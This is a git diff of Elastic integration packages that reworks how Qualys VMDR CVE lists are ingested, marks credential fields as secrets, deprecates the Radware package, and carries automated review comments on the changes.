[{"CHANGE_DATE": "2023-06-05T18:04:20Z","COMMENTS": "Real-time threat indicator \"High_Lateral_Movement\" 
added."},{"CHANGE_DATE": "2023-06-06T05:00:02Z","COMMENTS": "Exploit added."},{"CHANGE_DATE": "2023-06-06T05:00:02Z","COMMENTS": "CVSS V2 temporal score updated from \"4\" to \"4.3\"."},{"COMMENTS": "CVSS V3 temporal score updated from \"6.8\" to \"7\".","CHANGE_DATE": "2023-06-06T05:00:02Z"},{"CHANGE_DATE": "2023-06-06T06:02:45Z","COMMENTS": "Real-time threat indicator \"Exploit_Public\" added."}]},"CATEGORY": "Fedora","DISCOVERY": {"REMOTE": "0","ADDITIONAL_INFO": "Patch Available, Exploit Available","AUTH_TYPE_LIST": {"AUTH_TYPE": "Unix"}},"COMPLIANCE_LIST":{"COMPLIANCE":{"TYPE":"law","SECTION":"law_section","DESCRIPTION":"Not Provided"}},"SOLUTION_COMMENT":"comment3","SOLUTION": "Refer to Fedora security advisory Fedora 37 for updates and patch information.\n

Patch:
\nFollowing are links for downloading patches to fix the vulnerabilities:\n

ABCDEFG-2023-6e5d4757df:Fedora 37"} diff --git a/packages/qualys_vmdr/data_stream/knowledge_base/_dev/test/pipeline/test-knowledge-base.log-expected.json b/packages/qualys_vmdr/data_stream/knowledge_base/_dev/test/pipeline/test-knowledge-base.log-expected.json index 4281990feab..c265a235816 100644 --- a/packages/qualys_vmdr/data_stream/knowledge_base/_dev/test/pipeline/test-knowledge-base.log-expected.json +++ b/packages/qualys_vmdr/data_stream/knowledge_base/_dev/test/pipeline/test-knowledge-base.log-expected.json @@ -85,10 +85,9 @@ } } }, - "cve_list": { - "id": "CVE-2023-0341", - "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0341" - }, + "cve_list": [ + "CVE-2023-0341" + ], "cvss": { "access": { "complexity": "medium", @@ -188,21 +187,14 @@ "tags": [ "preserve_duplicate_custom_fields" ], - "url": { - "domain": "cve.mitre.org", - "extension": "cgi", - "original": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0341", - "path": "/cgi-bin/cvename.cgi", - "query": "name=CVE-2023-0341", - "scheme": "http" - }, "vulnerability": { "category": [ "Fedora" ], "description": "A stack buffer overflow exists in the ec_glob function of editorconfig-core-c before v0.12.6 which allowed an attacker to arbitrarily write to the stack and possibly allows remote code execution. editorconfig-core-c v0.12.6 resolved this vulnerability by bound checking all write operations over the p_pcre buffer.", - "id": "CVE-2023-0341", - "reference": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0341", + "id": [ + "CVE-2023-0341" + ], "severity": "Critical" } }, @@ -247,10 +239,9 @@ } } }, - "cve_list": { - "id": "CVE-2023-0341", - "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0341" - }, + "cve_list": [ + "CVE-2023-0341" + ], "diagnosis": { "value": "Fedora has released a security update for editorconfig to fix the vulnerabilities.

Affected OS:
Fedora 37


" }, @@ -298,21 +289,14 @@ "tags": [ "preserve_duplicate_custom_fields" ], - "url": { - "domain": "cve.mitre.org", - "extension": "cgi", - "original": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0341", - "path": "/cgi-bin/cvename.cgi", - "query": "name=CVE-2023-0341", - "scheme": "http" - }, "vulnerability": { "category": [ "Fedora" ], "description": "A stack buffer overflow exists in the ec_glob function of editorconfig-core-c before v0.12.6 which allowed an attacker to arbitrarily write to the stack and possibly allows remote code execution. editorconfig-core-c v0.12.6 resolved this vulnerability by bound checking all write operations over the p_pcre buffer.", - "id": "CVE-2023-0341", - "reference": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0341", + "id": [ + "CVE-2023-0341" + ], "severity": "Urgent" } }, @@ -401,10 +385,9 @@ } } }, - "cve_list": { - "id": "CVE-2023-0341", - "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0341" - }, + "cve_list": [ + "CVE-2023-0341" + ], "cvss": { "access": { "complexity": "medium", @@ -507,21 +490,14 @@ "tags": [ "preserve_duplicate_custom_fields" ], - "url": { - "domain": "cve.mitre.org", - "extension": "cgi", - "original": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0341", - "path": "/cgi-bin/cvename.cgi", - "query": "name=CVE-2023-0341", - "scheme": "http" - }, "vulnerability": { "category": [ "Fedora" ], "description": "A stack buffer overflow exists in the ec_glob function of editorconfig-core-c before v0.12.6 which allowed an attacker to arbitrarily write to the stack and possibly allows remote code execution. editorconfig-core-c v0.12.6 resolved this vulnerability by bound checking all write operations over the p_pcre buffer.", - "id": "CVE-2023-0341", - "reference": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0341", + "id": [ + "CVE-2023-0341" + ], "severity": "Critical" } } 
diff --git a/packages/qualys_vmdr/data_stream/knowledge_base/agent/stream/input.yml.hbs b/packages/qualys_vmdr/data_stream/knowledge_base/agent/stream/input.yml.hbs index 4c050685c26..ddcd5e05665 100644 --- a/packages/qualys_vmdr/data_stream/knowledge_base/agent/stream/input.yml.hbs +++ b/packages/qualys_vmdr/data_stream/knowledge_base/agent/stream/input.yml.hbs @@ -38,8 +38,12 @@ program: | } }).do_request().as(resp, bytes(resp.Body).decode_xml('qualys_api_2_0').as(body, { "events": (has(body.doc.KNOWLEDGE_BASE_VULN_LIST_OUTPUT.RESPONSE.VULN_LIST) ? - body.doc.KNOWLEDGE_BASE_VULN_LIST_OUTPUT.RESPONSE.VULN_LIST.VULN.map(e,{ - "message": e.encode_json() + body.doc.KNOWLEDGE_BASE_VULN_LIST_OUTPUT.RESPONSE.VULN_LIST.VULN.map(e, { + "message": e.with({"CVE_LIST": has(e.CVE_LIST) && has(e.CVE_LIST.CVE) ? + e.CVE_LIST.CVE.map(c, c.ID) + : + [] + }).encode_json() }) : has(body.doc.KNOWLEDGE_BASE_VULN_LIST_OUTPUT.RESPONSE.ID_SET) ? diff --git a/packages/qualys_vmdr/data_stream/knowledge_base/elasticsearch/ingest_pipeline/default.yml b/packages/qualys_vmdr/data_stream/knowledge_base/elasticsearch/ingest_pipeline/default.yml index 490e580de6e..19e006c1c02 100644 --- a/packages/qualys_vmdr/data_stream/knowledge_base/elasticsearch/ingest_pipeline/default.yml +++ b/packages/qualys_vmdr/data_stream/knowledge_base/elasticsearch/ingest_pipeline/default.yml @@ -35,6 +35,7 @@ processors: fields: - json.QID - json.LAST_SERVICE_MODIFICATION_DATETIME + - json.CVE_LIST target_field: _id ignore_missing: true - rename: @@ -149,9 +150,9 @@ processors: target_field: qualys_vmdr.knowledge_base.vuln_type ignore_missing: true - rename: - field: json.CVE_LIST.CVE.ID - tag: rename_CVE_LIST_CVE_ID - target_field: qualys_vmdr.knowledge_base.cve_list.id + field: json.CVE_LIST + tag: rename_CVE_LIST + target_field: qualys_vmdr.knowledge_base.cve_list ignore_missing: true - rename: field: json.CVSS.BASE 
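Review bot: The new `e.with({"CVE_LIST": ...})` expression assumes `e.CVE_LIST.CVE` always decodes as a list, but the pipeline test input in this same commit shows the decoded XML yielding a single object rather than a list when a repeated element occurs once (`CHANGE_LOG_INFO` and `THREAT_INTEL` appear both ways in test-knowledge-base.log), so a QID with exactly one `<CVE>` may reach `.map(c, c.ID)` as a map unless the `qualys_api_2_0` schema declares CVE as repeated; that is worth confirming and covering with a single-CVE case in the test log. The `[]` fallback also means every event now carries a `CVE_LIST` key, which feeds the `_id` fingerprint added in default.yml. The enclosing CEL program starts and ends outside the hunk.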
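Review bot: Adding `- json.CVE_LIST` to the `_id` fingerprint changes the document id of every QID already indexed, so the next knowledge-base collection will index new documents alongside the old ones instead of overwriting them; the bump to `version: "3.0.0"` in packages/qualys_vmdr/manifest.yml suggests this is intended, but the changelog entry should state that existing documents are not deduplicated after the upgrade. Because the CEL change always sets `CVE_LIST` (possibly `[]`), the fingerprint input differs even for QIDs that have no CVE. The processor list continues outside the hunk.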
@@ -303,17 +304,7 @@ processors:
- set:
field: vulnerability.id
tag: set_vulnerability_id
- copy_from: qualys_vmdr.knowledge_base.cve_list.id
- ignore_empty_value: true
- - rename:
- field: json.CVE_LIST.CVE.URL
- tag: rename_CVE_LIST_CVE_URL
- target_field: qualys_vmdr.knowledge_base.cve_list.url
- ignore_missing: true
- - set:
- field: vulnerability.reference
- tag: set_vulnerability_reference
- copy_from: qualys_vmdr.knowledge_base.cve_list.url
+ copy_from: qualys_vmdr.knowledge_base.cve_list
ignore_empty_value: true
- uri_parts:
field: vulnerability.reference
@@ -669,8 +660,7 @@ processors:
- qualys_vmdr.knowledge_base.last.service_modification_datetime
- qualys_vmdr.knowledge_base.qid
- qualys_vmdr.knowledge_base.category
- - qualys_vmdr.knowledge_base.cve_list.id
- - qualys_vmdr.knowledge_base.cve_list.url
+ - qualys_vmdr.knowledge_base.cve_list
- qualys_vmdr.knowledge_base.correlation.exploits.explt_src.list.explt.desc
- qualys_vmdr.knowledge_base.severity_level
tag: remove_preserve_duplicate_custom_fields
diff --git a/packages/qualys_vmdr/data_stream/knowledge_base/fields/fields.yml b/packages/qualys_vmdr/data_stream/knowledge_base/fields/fields.yml
index bb047a9d867..f9d78dd90db 100644
--- a/packages/qualys_vmdr/data_stream/knowledge_base/fields/fields.yml
+++ b/packages/qualys_vmdr/data_stream/knowledge_base/fields/fields.yml
@@ -88,12 +88,7 @@
- name: name
type: keyword
- name: cve_list
- type: group
- fields:
- - name: id
- type: keyword
- - name: url
- type: keyword
+ type: keyword
- name: cvss
type: group
fields:
diff --git a/packages/qualys_vmdr/data_stream/knowledge_base/manifest.yml b/packages/qualys_vmdr/data_stream/knowledge_base/manifest.yml
index 9172ff5b114..93b9626e30f 100644
--- a/packages/qualys_vmdr/data_stream/knowledge_base/manifest.yml
+++ b/packages/qualys_vmdr/data_stream/knowledge_base/manifest.yml
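Review bot: Nothing sets `vulnerability.reference` once the `set_vulnerability_reference` processor is removed, so the `uri_parts` processor on `field: vulnerability.reference` that begins at the end of the hunk is now dead code: if it lacks `ignore_missing: true` it fails every document, and if it has it, it should be dropped together with the `url.*` output it produced, which the expected test output in this commit no longer contains. The `uri_parts` options continue outside the hunk, so the flag cannot be confirmed here.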
@@ -15,7 +15,8 @@ streams: - name: initial_interval type: text title: Initial Interval - description: "How far back to pull the Knowledge Base data from Qualys VMDR. Supported units for this parameter are s, m, h." + description: >- + How far back to pull the Knowledge Base data from Qualys VMDR. Supported units for this parameter are s, m, h. multi: false required: true show_user: true @@ -23,7 +24,9 @@ streams: - name: interval type: text title: Interval - description: "Interval between two REST API calls. User can choose interval as per their plan mentioned in [Qualys API Limits](https://www.qualys.com/docs/qualys-api-limits.pdf). Supported units for this parameter are h/m/s." + description: >- + Interval between two REST API calls. User can choose interval as per their plan mentioned in + [Qualys API Limits](https://www.qualys.com/docs/qualys-api-limits.pdf). Supported units for this parameter are h/m/s. default: 6h multi: false required: true @@ -31,15 +34,19 @@ streams: - name: http_client_timeout type: text title: HTTP Client Timeout - description: "Duration before declaring that the HTTP client connection has timed out. Give a timeout of more than 1 minute when retrieving data which is more than 15 days old. Supported time units are ns, us, ms, s, m, h." + description: >- + Duration before declaring that the HTTP client connection has timed out. Give a timeout of more than 1 minute when + retrieving data which is more than 15 days old. Supported time units are ns, us, ms, s, m, h. Requests may take + significant time, so short timeouts are not recommended. multi: false required: true show_user: false - default: 3m + default: 10m - name: input_parameters type: text title: Input Parameters - description: "Input Parameters for the URL. param1=value¶m2=value¶m3=....*" + description: >- + Input Parameters for the URL. param1=value¶m2=value¶m3=....* multi: false required: false show_user: true 
diff --git a/packages/qualys_vmdr/data_stream/knowledge_base/sample_event.json b/packages/qualys_vmdr/data_stream/knowledge_base/sample_event.json index 1cdc5452356..ecf03e8e099 100644 --- a/packages/qualys_vmdr/data_stream/knowledge_base/sample_event.json +++ b/packages/qualys_vmdr/data_stream/knowledge_base/sample_event.json @@ -1,11 +1,11 @@ { "@timestamp": "2023-06-29T12:20:46.000Z", "agent": { - "ephemeral_id": "d0eb176e-bad7-47fa-9547-c1854ad7ca2d", - "id": "98ba96f5-b452-4fc7-8f5a-3d37a634ce61", + "ephemeral_id": "2680cdd8-c261-48cd-b70d-b958f911b86a", + "id": "339b7770-4966-47a8-bc07-60e4a5c83116", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.12.1" }, "data_stream": { "dataset": "qualys_vmdr.knowledge_base", @@ -16,9 +16,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "98ba96f5-b452-4fc7-8f5a-3d37a634ce61", + "id": "339b7770-4966-47a8-bc07-60e4a5c83116", "snapshot": false, - "version": "8.9.0" + "version": "8.12.1" }, "event": { "agent_id_status": "verified", @@ -27,7 +27,7 @@ ], "dataset": "qualys_vmdr.knowledge_base", "id": "11830", - "ingested": "2023-11-14T21:17:15Z", + "ingested": "2024-03-17T23:42:53Z", "kind": "alert", "type": [ "info" @@ -39,6 +39,10 @@ "qualys_vmdr": { "knowledge_base": { "category": "CGI", + "cve_list": [ + "CVE-2022-31629", + "CVE-2022-31628" + ], "discovery": { "remote": 1 }, @@ -69,6 +73,10 @@ "category": [ "CGI" ], + "id": [ + "CVE-2022-31629", + "CVE-2022-31628" + ], "severity": "Medium" } } \ No newline at end of file diff --git a/packages/qualys_vmdr/docs/README.md b/packages/qualys_vmdr/docs/README.md index 3641fc3cbcd..2fd7518bbcc 100644 --- a/packages/qualys_vmdr/docs/README.md +++ b/packages/qualys_vmdr/docs/README.md 
@@ -88,13 +88,13 @@ An example event for `asset_host_detection` looks as following: ```json { - "@timestamp": "2023-10-25T08:52:23.474Z", + "@timestamp": "2024-03-11T21:06:28.277Z", "agent": { - "ephemeral_id": "8365cc1b-0570-46a3-986b-eb86f03344d2", - "id": "50e7e437-d3fc-4872-8bd1-0da718796b4a", + "ephemeral_id": "798665d1-a592-4f07-8517-f7bdcdbda09f", + "id": "b7f7fd67-e199-4daf-b640-92e89c091cc6", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.12.1" }, "data_stream": { "dataset": "qualys_vmdr.asset_host_detection", @@ -105,9 +105,9 @@ An example event for `asset_host_detection` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "50e7e437-d3fc-4872-8bd1-0da718796b4a", + "id": "b7f7fd67-e199-4daf-b640-92e89c091cc6", "snapshot": false, - "version": "8.9.0" + "version": "8.12.1" }, "event": { "agent_id_status": "verified", @@ -115,7 +115,7 @@ An example event for `asset_host_detection` looks as following: "host" ], "dataset": "qualys_vmdr.asset_host_detection", - "ingested": "2023-10-25T08:52:26Z", + "ingested": "2024-03-11T21:06:40Z", "kind": "alert", "type": [ "info" 
@@ -142,30 +142,58 @@ An example event for `asset_host_detection` looks as following: "scanned_duration": 1113 } }, - "list": [ - { - "first": { - "found_datetime": "2023-06-28T06:04:26.000Z" + "tracking_method": "IP", + "vulnerability": { + "affect": { + "running": { + "kernel": "0" + } + }, + "first": { + "found_datetime": "2021-02-05T04:50:45.000Z" + }, + "is_disabled": false, + "is_ignored": false, + "last": { + "fixed_datetime": "2022-12-14T06:52:57.000Z", + "found_datetime": "2024-03-08T20:15:41.000Z", + "processed_datetime": "2024-03-08T20:15:41.000Z", + "test_datetime": "2024-03-08T20:15:41.000Z", + "update_datetime": "2024-03-08T20:15:41.000Z" + }, + "qds": { + "severity": "LOW", + "text": "35" + }, + "qds_factors": [ + { + "name": "CVSS", + "text": "7.7" }, - "is_disabled": false, - "is_ignored": false, - "last": { - "found_datetime": "2023-07-03T06:23:47.000Z", - "processed_datetime": "2023-07-03T06:25:17.000Z", - "test_datetime": "2023-07-03T06:23:47.000Z", - "update_datetime": "2023-07-03T06:25:17.000Z" + { + "name": "CVSS_version", + "text": "v3.x" }, - "qid": "91681", - "severity": 5, - "ssl": "0", - "status": "Active", - "times": { - "found": 11 + { + "name": "epss", + "text": "0.00232" }, - "type": "Confirmed" - } - ], - "tracking_method": "IP" + { + "name": "CVSS_vector", + "text": "AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H" + } + ], + "qid": "197595", + "results": "Package Installed Version Required Version\nlinux-cloud-tools-4.4.0 1074-aws_4.4.0-1074.84 1092\nlinux-aws-tools-4.4.0 1074_4.4.0-1074.84 1092\nlinux-aws-headers-4.4.0 1074_4.15.0-1126.135 1092\nlinux-tools-4.4.0 1074-aws_4.4.0-1074.84 1092\nlinux-aws-cloud-tools-4.4.0 1074_4.4.0-1074.84 1092", + "severity": 3, + "ssl": "0", + "status": "Active", + "times": { + "found": 5393 + }, + "type": "Confirmed", + "unique_vuln_id": "5555555555" + } } }, "related": { 
@@ -182,7 +210,6 @@ An example event for `asset_host_detection` looks as following: "qualys_vmdr-asset_host_detection" ] } - ``` **Exported fields** 
@@ -218,37 +245,6 @@ An example event for `asset_host_detection` looks as following: | qualys_vmdr.asset_host_detection.last.vm.auth.scanned_duration | | long | | qualys_vmdr.asset_host_detection.last.vm.scanned_date | | date | | qualys_vmdr.asset_host_detection.last.vm.scanned_duration | | long | -| qualys_vmdr.asset_host_detection.list.affect.exploitable_config | | keyword | -| qualys_vmdr.asset_host_detection.list.affect.running.kernel | | keyword | -| qualys_vmdr.asset_host_detection.list.affect.running.service | | keyword | -| qualys_vmdr.asset_host_detection.list.asset_cve | | keyword | -| qualys_vmdr.asset_host_detection.list.first.found_datetime | | date | -| qualys_vmdr.asset_host_detection.list.first.reopened_datetime | | date | -| qualys_vmdr.asset_host_detection.list.fqdn | | keyword | -| qualys_vmdr.asset_host_detection.list.instance | | keyword | -| qualys_vmdr.asset_host_detection.list.is_disabled | | boolean | -| qualys_vmdr.asset_host_detection.list.is_ignored | | boolean | -| qualys_vmdr.asset_host_detection.list.last.fixed_datetime | | date | -| qualys_vmdr.asset_host_detection.list.last.found_datetime | | date | -| qualys_vmdr.asset_host_detection.list.last.processed_datetime | | date | -| qualys_vmdr.asset_host_detection.list.last.reopened_datetime | | date | -| qualys_vmdr.asset_host_detection.list.last.test_datetime | | date | -| qualys_vmdr.asset_host_detection.list.last.update_datetime | | date | -| qualys_vmdr.asset_host_detection.list.port | | long | -| qualys_vmdr.asset_host_detection.list.protocol | | keyword | -| qualys_vmdr.asset_host_detection.list.qds.severity | | keyword | -| qualys_vmdr.asset_host_detection.list.qds.text | | keyword | -| qualys_vmdr.asset_host_detection.list.qds_factors.name | | keyword | -| qualys_vmdr.asset_host_detection.list.qds_factors.text | | keyword | -| qualys_vmdr.asset_host_detection.list.qid | | keyword | -| qualys_vmdr.asset_host_detection.list.results | | keyword | -| 
qualys_vmdr.asset_host_detection.list.service | | keyword | -| qualys_vmdr.asset_host_detection.list.severity | | long | -| qualys_vmdr.asset_host_detection.list.ssl | | keyword | -| qualys_vmdr.asset_host_detection.list.status | | keyword | -| qualys_vmdr.asset_host_detection.list.times.found | | long | -| qualys_vmdr.asset_host_detection.list.times.reopened | | long | -| qualys_vmdr.asset_host_detection.list.type | | keyword | | qualys_vmdr.asset_host_detection.metadata.azure.attribute.last.error.date | | date | | qualys_vmdr.asset_host_detection.metadata.azure.attribute.last.error.value | | keyword | | qualys_vmdr.asset_host_detection.metadata.azure.attribute.last.status | | keyword | 
@@ -277,6 +273,38 @@ An example event for `asset_host_detection` looks as following: | qualys_vmdr.asset_host_detection.tags.id | | keyword | | qualys_vmdr.asset_host_detection.tags.name | | keyword | | qualys_vmdr.asset_host_detection.tracking_method | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.affect.exploitable_config | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.affect.running.kernel | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.affect.running.service | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.asset_cve | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.first.found_datetime | | date | +| qualys_vmdr.asset_host_detection.vulnerability.first.reopened_datetime | | date | +| qualys_vmdr.asset_host_detection.vulnerability.fqdn | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.instance | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.is_disabled | | boolean | +| qualys_vmdr.asset_host_detection.vulnerability.is_ignored | | boolean | +| qualys_vmdr.asset_host_detection.vulnerability.last.fixed_datetime | | date | +| qualys_vmdr.asset_host_detection.vulnerability.last.found_datetime | | date | +| qualys_vmdr.asset_host_detection.vulnerability.last.processed_datetime | | date | +| qualys_vmdr.asset_host_detection.vulnerability.last.reopened_datetime | | date | +| qualys_vmdr.asset_host_detection.vulnerability.last.test_datetime | | date | +| qualys_vmdr.asset_host_detection.vulnerability.last.update_datetime | | date | +| qualys_vmdr.asset_host_detection.vulnerability.port | | long | +| qualys_vmdr.asset_host_detection.vulnerability.protocol | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.qds.severity | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.qds.text | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.qds_factors.name | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.qds_factors.text | | 
keyword | +| qualys_vmdr.asset_host_detection.vulnerability.qid | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.results | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.service | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.severity | | long | +| qualys_vmdr.asset_host_detection.vulnerability.ssl | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.status | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.times.found | | long | +| qualys_vmdr.asset_host_detection.vulnerability.times.reopened | | long | +| qualys_vmdr.asset_host_detection.vulnerability.type | | keyword | +| qualys_vmdr.asset_host_detection.vulnerability.unique_vuln_id | | keyword | | tags | User defined tags. | keyword | @@ -292,11 +320,11 @@ An example event for `knowledge_base` looks as following: { "@timestamp": "2023-06-29T12:20:46.000Z", "agent": { - "ephemeral_id": "d0eb176e-bad7-47fa-9547-c1854ad7ca2d", - "id": "98ba96f5-b452-4fc7-8f5a-3d37a634ce61", + "ephemeral_id": "2680cdd8-c261-48cd-b70d-b958f911b86a", + "id": "339b7770-4966-47a8-bc07-60e4a5c83116", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.0" + "version": "8.12.1" }, "data_stream": { "dataset": "qualys_vmdr.knowledge_base", @@ -307,9 +335,9 @@ An example event for `knowledge_base` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "98ba96f5-b452-4fc7-8f5a-3d37a634ce61", + "id": "339b7770-4966-47a8-bc07-60e4a5c83116", "snapshot": false, - "version": "8.9.0" + "version": "8.12.1" }, "event": { "agent_id_status": "verified", @@ -318,7 +346,7 @@ An example event for `knowledge_base` looks as following: ], "dataset": "qualys_vmdr.knowledge_base", "id": "11830", - "ingested": "2023-11-14T21:17:15Z", + "ingested": "2024-03-17T23:42:53Z", "kind": "alert", "type": [ "info" 
@@ -330,6 +358,10 @@ An example event for `knowledge_base` looks as following:
"qualys_vmdr": {
"knowledge_base": {
"category": "CGI",
+ "cve_list": [
+ "CVE-2022-31629",
+ "CVE-2022-31628"
+ ],
"discovery": {
"remote": 1
},
@@ -360,6 +392,10 @@ An example event for `knowledge_base` looks as following:
"category": [
"CGI"
],
+ "id": [
+ "CVE-2022-31629",
+ "CVE-2022-31628"
+ ],
"severity": "Medium"
}
}
@@ -399,8 +435,7 @@ An example event for `knowledge_base` looks as following:
| qualys_vmdr.knowledge_base.correlation.malware.src.list.info.rating | | keyword |
| qualys_vmdr.knowledge_base.correlation.malware.src.list.info.type | | keyword |
| qualys_vmdr.knowledge_base.correlation.malware.src.name | | keyword |
-| qualys_vmdr.knowledge_base.cve_list.id | | keyword |
-| qualys_vmdr.knowledge_base.cve_list.url | | keyword |
+| qualys_vmdr.knowledge_base.cve_list | | keyword |
| qualys_vmdr.knowledge_base.cvss.access.complexity | | keyword |
| qualys_vmdr.knowledge_base.cvss.access.vector | | keyword |
| qualys_vmdr.knowledge_base.cvss.authentication | | keyword |
diff --git a/packages/qualys_vmdr/manifest.yml b/packages/qualys_vmdr/manifest.yml
index 0548229fd89..bdfd12b7976 100644
--- a/packages/qualys_vmdr/manifest.yml
+++ b/packages/qualys_vmdr/manifest.yml
@@ -1,7 +1,7 @@
-format_version: "3.0.0"
+format_version: "3.0.2"
name: qualys_vmdr
title: Qualys VMDR
-version: "1.0.1"
+version: "3.0.0"
description: Collect data from Qualys VMDR platform with Elastic Agent.
type: integration
categories:
@@ -9,7 +9,7 @@ categories:
- vulnerability_management
conditions:
kibana:
- version: ^8.9.0
+ version: ^8.12.0
elastic:
subscription: basic
screenshots:
@@ -49,6 +49,7 @@ policy_templates:
multi: false
required: true
show_user: true
+ secret: true
- name: proxy_url
type: text
title: Proxy URL
diff --git a/packages/rabbitmq/changelog.yml b/packages/rabbitmq/changelog.yml
index 7f52f2fa629..691a1388cd4 100644
--- a/packages/rabbitmq/changelog.yml
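Review bot: `secret: true` is added to a variable whose `name:` line lies outside the hunk, so the hunk alone cannot confirm that the flag lands on the API credential rather than a neighbouring setting; the same applies to the identical hunk in packages/rapid7_insightvm/manifest.yml. The `kibana: version: ^8.12.0` change in the same file matches the stack version from which secret variables are supported (as the rabbitmq changelog in this commit states), so the two changes are consistent. The `- name: proxy_url` context suggests the variable is the one declared immediately before the proxy setting; worth a glance at the full policy template.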
+++ b/packages/rabbitmq/changelog.yml
@@ -1,3 +1,18 @@
+- version: 1.13.0
+ changes:
+ - description: Enable secrets for sensitive fields. For more details, refer https://www.elastic.co/guide/en/fleet/current/agent-policy.html#agent-policy-secret-values
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9321
+- version: 1.12.1
+ changes:
+ - description: Disable secrets for older stack versions due to errors.
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/9279
+- version: 1.12.0
+ changes:
+ - description: Enable 'secret' for the sensitive fields, supported from 8.12.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9009
- version: 1.11.0
changes:
- description: Update the package format_version to 3.0.0.
diff --git a/packages/rabbitmq/manifest.yml b/packages/rabbitmq/manifest.yml
index 729a9ce3658..cdce65aa859 100644
--- a/packages/rabbitmq/manifest.yml
+++ b/packages/rabbitmq/manifest.yml
@@ -1,7 +1,7 @@
-format_version: "3.0.0"
+format_version: "3.0.2"
name: rabbitmq
title: RabbitMQ Logs and Metrics
-version: "1.11.0"
+version: "1.13.0"
description: Collect and parse logs from RabbitMQ servers with Elastic Agent.
type: integration
categories:
@@ -9,7 +9,7 @@ categories:
- observability
conditions:
kibana:
- version: "^8.8.0"
+ version: "^8.12.0"
elastic:
subscription: basic
screenshots:
@@ -60,6 +60,7 @@ policy_templates:
- name: password
type: password
title: Password
+ secret: true
multi: false
required: false
show_user: false
diff --git a/packages/radware/_dev/deploy/docker/docker-compose.yml b/packages/radware/_dev/deploy/docker/docker-compose.yml
index fd6532ff8ec..4472d229d4e 100644
--- a/packages/radware/_dev/deploy/docker/docker-compose.yml
+++ b/packages/radware/_dev/deploy/docker/docker-compose.yml
@@ -11,10 +11,10 @@ services:
volumes:
- ./sample_logs:/sample_logs:ro
entrypoint: /bin/bash
- command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9535 -p=udp /sample_logs/radware-defensepro-*.log"
+ command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9535 -p=udp /sample_logs/radware-defensepro-*.log
radware-defensepro-tcp:
image: akroh/stream:v0.2.0
volumes:
- ./sample_logs:/sample_logs:ro
entrypoint: /bin/bash
- command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9535 -p=tcp /sample_logs/radware-defensepro-*.log"
+ command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9535 -p=tcp /sample_logs/radware-defensepro-*.log
diff --git a/packages/radware/changelog.yml b/packages/radware/changelog.yml
index 81ecc80a4cb..7a6da86e686 100644
--- a/packages/radware/changelog.yml
+++ b/packages/radware/changelog.yml
@@ -1,4 +1,9 @@
# newer versions go on top
+- version: "0.19.0"
+ changes:
+ - description: Deprecate package.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9074
- version: "0.18.2"
changes:
- description: Changed owners
diff --git a/packages/radware/manifest.yml b/packages/radware/manifest.yml
index 1a700702600..c26cbda4216 100644
--- a/packages/radware/manifest.yml
+++ b/packages/radware/manifest.yml
@@ -1,12 +1,12 @@
format_version: 2.7.0
name: radware
-title: Radware DefensePro Logs
-version: "0.18.2"
-description: Collect defensePro logs from Radware devices with Elastic Agent.
+title: Radware DefensePro Logs (Deprecated)
+version: "0.19.0"
+description: Deprecated. Radware DefensePro Logs is no longer supported.
categories: ["security"]
type: integration
conditions:
- kibana.version: "^7.14.0 || ^8.0.0"
+ kibana.version: "^8.8.0"
policy_templates:
- name: defensepro
title: Radware DefensePro
diff --git a/packages/rapid7_insightvm/changelog.yml b/packages/rapid7_insightvm/changelog.yml
index e317c5913ea..4bfc5cd9d6b 100644
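Review bot: In the docker-compose hunk the `entrypoint: /bin/bash` line is kept as context in both services, so the new `command: log --start-signal=...` is handed to bash as a script path — the container would run `/bin/bash log ...` and fail on a missing file named `log` rather than invoking `/stream`. Either the `entrypoint: /bin/bash` line should be dropped so the image's own entrypoint receives `log ...`, or the command should keep the `-c "/stream log ..."` form; the tcp service a few lines down has the same problem. Note also that `/sample_logs/radware-defensepro-*.log` was previously glob-expanded by the shell; without bash in the path, the stream binary itself has to expand that pattern, which is worth confirming before relying on the shorter form.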
--- a/packages/rapid7_insightvm/changelog.yml
+++ b/packages/rapid7_insightvm/changelog.yml
@@ -1,4 +1,9 @@
# newer versions go on top
+- version: "1.9.0"
+ changes:
+ - description: Set sensitive values as secret.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9128
- version: "1.8.2"
